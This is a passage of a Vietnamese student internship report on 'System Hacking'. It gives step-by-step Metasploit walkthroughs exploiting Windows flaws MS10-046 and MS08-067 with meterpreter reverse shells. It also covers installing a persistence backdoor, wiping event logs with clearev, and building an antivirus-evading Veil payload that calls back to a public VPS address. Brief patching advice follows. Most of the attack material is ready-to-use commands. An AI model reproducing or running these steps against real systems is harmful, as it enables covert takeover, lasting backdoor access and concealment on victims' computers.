16 Đoàn Duy Khiêm – BÁO CÁO THỰC TẬP
getcwd: cho biết thư mục đang làm việc hiện tại
ls: liệt kê các thư mục và tập tin
upload src1 [src2 ...] dst: upload file từ src tới dst.
download src1 [src2 ...] dst: download file từ src tới dst.
b) Sử dụng module Net
ipconfig: xem câu hình của card mạng của máy tính từ xa
route: xem bảng định tuyến của remote machine
c) Sử dụng module Process
execute -f file [ -a args ] [ -Hc ]:Câu lệnh execute cho
phép tạo ra một process mới trên remote machine và sử
dụng process đó để khai thác dữ liệu
kill pid1 pid2 pid3:huỷ hoặc tắt các process đang chạy
trên máy remote machine
ps: liệt kê những process của remote machine
d) Sử dụng module Sys
getuid: cho biết username hiện tại của remote machine
sysinfo: cho biết thông tin về máy tính nạn nhân: hệ điều
hành, phiên bản, nền tản 32bits hay 64bits
5. Cách phòng chống
Thường xuyên cập nhật các bản vá lỗi của Microsofts. Ví dụ như
để Metasploit không thể khai thác được lỗi Lsass_ms04_011,
chúng ta phải cập nhật bản vá lỗi của Microsoft. Theo Microsoft
đánh giá, đây là một lỗi nghiêm trọng, có trên hầu hết tất cả các
hệ điều hành windows. Chúng ta nên sử dụng hotfix có number là
835732 để vá lỗi trên.
II. Lỗi MS10-046 (2286198)
1. Giới thiệu
Đây là một lỗi rất nghiêm trọng liên quan đến Windows Shell cho
tất cả các hệ điều hành bị ảnh hưởng, cho phép kẻ tấn công
chiếm lấy toàn quyền điều khiển Windows và thực thi mã nguồn
17. ĐỀ TÀI :Tấn Công Hệ Thống – System Hacking GVHD : Võ Công Minh
17 Đoàn Duy Khiêm – BÁO CÁO THỰC TẬP
từ xa. Lỗi này được phát hiện vào tháng 06/2010 và đến tháng
08/2010, Microsoft tung ba bản vá lỗi.
Lỗi nguy hiểm này nằm trong các tập tin "shortcut" (*.lnk) của
Windows, các tập tin này thường nằm ở giao diện desktop hay
trình đơn Start. Bằng cách tạo ra một tập tin shortcut nhúng mã
độc, tin tặc có thể tự động thực thi mã độc khi người dùng xem
tập tin shortcut hay nội dung của một thư mục chứa tập tin
shortcut nhúng mã độc.
Các bản Windows bị ảnh hưởng bao gồm
2. Các bước tấn công
a. (mạng LAN)
Khởi động Kali Linux và đăng nhập thành công ,
mở terminal ta được
18. ĐỀ TÀI :Tấn Công Hệ Thống – System Hacking GVHD : Võ Công Minh
18 Đoàn Duy Khiêm – BÁO CÁO THỰC TẬP
Ta gõ : msfconsole và enter
Để dùng mã lỗi ms10-046:search ms10-046 và enter
19. ĐỀ TÀI :Tấn Công Hệ Thống – System Hacking GVHD : Võ Công Minh
19 Đoàn Duy Khiêm – BÁO CÁO THỰC TẬP
20. ĐỀ TÀI :Tấn Công Hệ Thống – System Hacking GVHD : Võ Công Minh
20 Đoàn Duy Khiêm – BÁO CÁO THỰC TẬP
Ta gõ tiếp: use
exploit/windows/browser/ms10_046_shortcut_icon_dllload
và enter
Dùng Lệnh show options để xem các tham số cần
thiết để có thể tiến hành tấn công được:
o SRVHOST: địa chỉ máy của kẻ tấn công, để
lắng nghe có nạn nhân nào kết nối đến hay
không
o SRVPORT: cổng lắng nghe ,mặc định là
http(80)
21. ĐỀ TÀI :Tấn Công Hệ Thống – System Hacking GVHD : Võ Công Minh
21 Đoàn Duy Khiêm – BÁO CÁO THỰC TẬP
Tiếp theo ta sẽ
o set payload windows/meterpreter/reverse_tcp
o set srvhost 192.168.181.128
o Set lhost địa chỉ ip:set lhost 192.168.181.128 .lhost
là tham số của payload mà ta vừa set ở trên
exploit để khởi động server lắng nghe trên máy tấn công
22. ĐỀ TÀI :Tấn Công Hệ Thống – System Hacking GVHD : Võ Công Minh
22 Đoàn Duy Khiêm – BÁO CÁO THỰC TẬP
Trên máy tính nạn nhân, tạo 1 shortcut bằng cách nhấn phải
chuột vào
Desktop -> New -> Shortcut
Ta gõ vào địa chỉ của máy tấn công vào Type the location of
the item:
http://192.168.1.35/anythingvà chọn Next
23. ĐỀ TÀI :Tấn Công Hệ Thống – System Hacking GVHD : Võ Công Minh
23 Đoàn Duy Khiêm – BÁO CÁO THỰC TẬP
Đặt tên cho shortcut vừa mới tạo và nhấn Finish. Ta sẽ mở
shortcut này:
Đợi một lát, trên máy tính tấn công ta được:
24. ĐỀ TÀI :Tấn Công Hệ Thống – System Hacking GVHD : Võ Công Minh
24 Đoàn Duy Khiêm – BÁO CÁO THỰC TẬP
Dùng lệnh sessions để xem các phiên làm việc mà Metasploit
đang có:
Để tương tác với 1 session nào đó ta thực hiện: sessions –i 1 (1
là id của sessions)
Và bây giờ thì mọi việc đã trở nên dễ dàng hơn, khi kẻ tấn
công đã điều khiển
được máy nạn nhân với toàn quyền. Ví dụ:
25. ĐỀ TÀI :Tấn Công Hệ Thống – System Hacking GVHD : Võ Công Minh
25 Đoàn Duy Khiêm – BÁO CÁO THỰC TẬP
Lệnh sysinfo để lấy thông tin của máy nạn nhân:
Lệnh rất hữu ích để sử dụng cmd (command-line): shell
Lấy ip victim qua cmd(dùng ipconfig) :
Xem các chương trình chạy trên máy victim (dùng tasklist):
26. ĐỀ TÀI :Tấn Công Hệ Thống – System Hacking GVHD : Võ Công Minh
26 Đoàn Duy Khiêm – BÁO CÁO THỰC TẬP
Thoát cmd (dùng lệnh “exit”):
sau khi hoàn thành bước xâm nhập vào máy nạn nhận, các
hacker thường tiến hành bước tiếp theo là cần duy trì để sau này
có thể truy cập lại dễ dàng mà không cần thực hiện nhiều công
đoạn. Việc duy trì kết nối thông thường bằng cách bỏ backdoor
vào máy victim
Cài Backdoor trên máy victim(câu lệnh:”run persistence” –h
để xem help):
27. ĐỀ TÀI :Tấn Công Hệ Thống – System Hacking GVHD : Võ Công Minh
27 Đoàn Duy Khiêm – BÁO CÁO THỰC TẬP
Dựa vào trên ta dùng câu lệnh như sau:
Xong , ta đã cài backdoor vào máy victim. Cho dù victim tắt máy
, khi log on lên màn hình metasploit sẽ connect lại.
Đễ xem backdoor của mình trên máy victim ta thấy pid của
backdoor là 704 (hình trên)
Ta dùng “shell” , “ tasklist” để xem .
Xóa dấu vết sau khi tấn công: (dùng lệnh “clearev”)
28. ĐỀ TÀI :Tấn Công Hệ Thống – System Hacking GVHD : Võ Công Minh
28 Đoàn Duy Khiêm – BÁO CÁO THỰC TẬP
Mã lỗi ms08_067
Khởi động metasploit và search mã lỗi ms08_067
Dùng lệnh show option để xem yêu cầu
29. ĐỀ TÀI :Tấn Công Hệ Thống – System Hacking GVHD : Võ Công Minh
29 Đoàn Duy Khiêm – BÁO CÁO THỰC TẬP
Set các giá trị
RHOST : IP victim
RPORT : mặc định
PAYLOAD : thư viện sử dụng
LHOST : IP máy attack
30. ĐỀ TÀI :Tấn Công Hệ Thống – System Hacking GVHD : Võ Công Minh
30 Đoàn Duy Khiêm – BÁO CÁO THỰC TẬP
Dùng lệnh exploit để tiến hành tấn công
Quá trình tấn công hoàn tất , bây giờ có thể điều khiển được
máy victim
31. ĐỀ TÀI :Tấn Công Hệ Thống – System Hacking GVHD : Võ Công Minh
31 Đoàn Duy Khiêm – BÁO CÁO THỰC TẬP
Dùng lệnh screenshot để chup màn hinh victim … và còn
nhiều chức năng khác .
32. ĐỀ TÀI :Tấn Công Hệ Thống – System Hacking GVHD : Võ Công Minh
32 Đoàn Duy Khiêm – BÁO CÁO THỰC TẬP
b. Triễn Khai trên vps
Mã hóa bằng Veil
cd Veil-Evasion
./Veil-Evasion.py
list
use python/meterpreter/rev_tcp
set LHOST 162.250.123.132
setcompile_to exe Y
generate
*filename*
ởđây mình dùng vpslinux Ubuntu server
download putty.exe và đăng nhập
33. ĐỀ TÀI :Tấn Công Hệ Thống – System Hacking GVHD : Võ Công Minh
33 Đoàn Duy Khiêm – BÁO CÁO THỰC TẬP
download và tải metasploit + Veil
gõmsfconsole và sữdụng lệnh : use exploit/multi/hander
34. ĐỀ TÀI :Tấn Công Hệ Thống – System Hacking GVHD : Võ Công Minh
34 Đoàn Duy Khiêm – BÁO CÁO THỰC TẬP
tiếp theo ta sẽ:
set payload windows/meterpreter/reverse_tcp
show options
setlhost<dia chi ipvps> - set lhost 162.250.123.132
35. ĐỀ TÀI :Tấn Công Hệ Thống – System Hacking GVHD : Võ Công Minh
35 Đoàn Duy Khiêm – BÁO CÁO THỰC TẬP
ta được giao diện nhưsau :
Xong ta gõ exploit và đợi victim nhiễm nhưbên vps .
nâng quyền ta dùng getsystem – lưu ý chỉ sữdụng khi user hiện tại là
administraitor
36. ĐỀ TÀI :Tấn Công Hệ Thống – System Hacking GVHD : Võ Công Minh
36 Đoàn Duy Khiêm – BÁO CÁO THỰC TẬP
III. Cách phòng chống
Thường xuyên cập nhật các bản vá lỗi của Windows để trách bị
hacker lợi dụng.
Bản vá lỗi có tên mã là KB2286198 chứa đựng phiên bản mới
của tập tin Shell32.dll, đây là phần cập nhật quan trọng.
Shell32.dll là một tập tin thư viện rất quan trọng trong Windows,
nó chứa đựng một số hàm Windows Shell API. Nếu Shell32.dll bị
lỗi hay cập nhật lỗi, máy tính sẽ có tình trạng "Màn hình xanh
chết chóc" hay Blue Screen.
37. ĐỀ TÀI :Tấn Công Hệ Thống – System Hacking GVHD : Võ Công Minh
37 Đoàn Duy Khiêm – BÁO CÁO THỰC TẬP
TÀI LIỆU THAM KHẢO
[1]. Trang Web: hackforums.net
[2]. Trang Web: ubers.org
[3]. Trang web :forum.whitehat.vn
[4] Tài Liệu Học Tập Athena – Bộ CD System Hacking
[5] Kali CookBook
THE END